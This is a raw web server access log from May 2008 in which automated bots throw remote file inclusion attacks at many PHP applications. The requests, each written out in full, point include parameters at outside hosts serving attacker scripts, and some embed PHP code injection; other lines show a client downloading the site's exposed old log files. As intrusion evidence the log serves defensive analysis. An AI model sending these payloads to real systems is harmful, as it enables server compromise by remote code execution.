70.84.98.162 - - [29/May/2008:09:00:03 -0700] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.173.255.213 - - [29/May/2008:09:00:05 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.173.255.213 - - [29/May/2008:09:00:05 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:09:00:22 -0700] "GET /logs/access_071230.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:09:00:22 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:09:00:22 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:00:33 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:00:33 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:00:37 -0700] "GET /logs/access_080201.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:00:37 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:00:47 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:00:47 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:09:00:47 -0700] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [29/May/2008:09:00:50 -0700] "GET /logs//sitemap.xml//modules/Neos_Chronos/header.php?base_folder=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
151.11.24.250 - - [29/May/2008:09:00:50 -0700] "GET //sitemap.xml//modules/Neos_Chronos/header.php?base_folder=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:00:57 -0700] "GET /logs/access_080106.log//inc/claro_init_header.inc.php?includePath=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:00:57 -0700] "GET //inc/claro_init_header.inc.php?includePath=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:00:58 -0700] "GET /logs//inc/claro_init_header.inc.php?includePath=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:01:06 -0700] "GET /logs/access_080106.log//inc/claro_init_header.inc.php?includePath=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:01:07 -0700] "GET //inc/claro_init_header.inc.php?includePath=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:01:07 -0700] "GET /logs//inc/claro_init_header.inc.php?includePath=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:01:14 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:01:14 -0700] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:01:14 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:09:01:44 -0700] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:01:49 -0700] "GET /logs/access_080305.log/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:01:51 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:01:51 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
81.169.183.131 - - [29/May/2008:09:01:51 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.183.131 - - [29/May/2008:09:01:53 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:09:01:57 -0700] "GET /logs/access_080327.log/joomla/index.php?option=com_restaurante&task=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.173.255.213 - - [29/May/2008:09:02:08 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.173.255.213 - - [29/May/2008:09:02:09 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:02:28 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:02:34 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:09:02:34 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:03:02 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:03:02 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:03:02 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:03:04 -0700] "GET /logs/access_080201.log//inc/claro_init_header.inc.php?includePath=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:03:05 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:03:05 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:03:19 -0700] "GET /logs/access_080201.log//inc/claro_init_header.inc.php?includePath=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:09:03:27 -0700] "GET /logs/access_071218.log//modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.51.230 - - [29/May/2008:09:03:49 -0700] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:09:03:53 -0700] "GET /logs/access.log/claroline/inc/claro_init_header.inc.php?includePath=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:09:03:57 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:09:03:59 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:09:04:04 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:04:12 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:04:15 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:04:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:04:37 -0700] "GET /logs/access_080302.log//trans/trans.php?trans=fr&page=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:04:37 -0700] "GET //trans/trans.php?trans=fr&page=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:04:37 -0700] "GET /logs//trans/trans.php?trans=fr&page=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.119.227 - - [29/May/2008:09:04:37 -0700] "GET /logs/access_080327.log/joomla/index.php?option=com_restaurante&task=http://imanicm.com/webcalendar/includes/readme? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:04:40 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:04:41 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:04:41 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:04:43 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:09:04:48 -0700] "GET /logs/access_071218.log//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.134.240.162 - - [29/May/2008:09:04:58 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blackcard.newsit.es/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
205.134.240.162 - - [29/May/2008:09:04:58 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blackcard.newsit.es/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:09:05:11 -0700] "GET /logs/access_080209.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:09:05:12 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:09:05:12 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.51.170 - - [29/May/2008:09:05:44 -0700] "GET /presto/?D=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.134.240.162 - - [29/May/2008:09:05:53 -0700] "GET /logs//sitemap.xml//modules/Neos_Chronos/header.php?base_folder=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.240.162 - - [29/May/2008:09:05:53 -0700] "GET //sitemap.xml//modules/Neos_Chronos/header.php?base_folder=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:09:05:56 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.16.233.242 - - [29/May/2008:09:06:28 -0700] "GET /logs/access_080109.log HTTP/1.1" 200 621135 "-" "-" "www.dmulk.com"
84.16.233.242 - - [29/May/2008:09:06:28 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "-" "www.dmulk.com"
84.16.233.242 - - [29/May/2008:09:06:33 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "-" "www.dmulk.com"
84.16.233.242 - - [29/May/2008:09:06:33 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 585838 "-" "-" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:06:34 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.16.233.242 - - [29/May/2008:09:06:35 -0700] "GET /logs/access_080117.log HTTP/1.1" 200 670488 "-" "-" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:08:15 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:08:21 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:08:21 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.129.194.100 - - [29/May/2008:09:08:24 -0700] "GET /logs/access_071217.log HTTP/1.0" 200 231335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:08:26 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:08:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:08:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:09:09:38 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:09:09:38 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.8.66 - - [29/May/2008:09:10:24 -0700] "GET /logs/errors.php?error=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.8.66 - - [29/May/2008:09:10:24 -0700] "GET /errors.php?error=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:09:10:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:11:08 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:12:09 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:12:10 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:12:10 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:09:12:10 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:09:12:25 -0700] "GET /logs/yabbse/Sources/Packages.php?sourcedir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:09:12:40 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:09:12:41 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.6.19.176 - - [29/May/2008:09:12:43 -0700] "GET /plans/?M=A HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:13:09 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:13:09 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/May/2008:09:13:15 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/May/2008:09:13:15 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:09:13:21 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:09:13:22 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:13:22 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.240.162 - - [29/May/2008:09:13:47 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blackcard.newsit.es/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
205.134.240.162 - - [29/May/2008:09:13:48 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blackcard.newsit.es/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:14:42 -0700] "GET /logs//includes/get_header.php?vwar_root=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:14:42 -0700] "GET //includes/get_header.php?vwar_root=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:14:42 -0700] "GET //administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:15:11 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:15:12 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:15:12 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:15:16 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:15:21 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
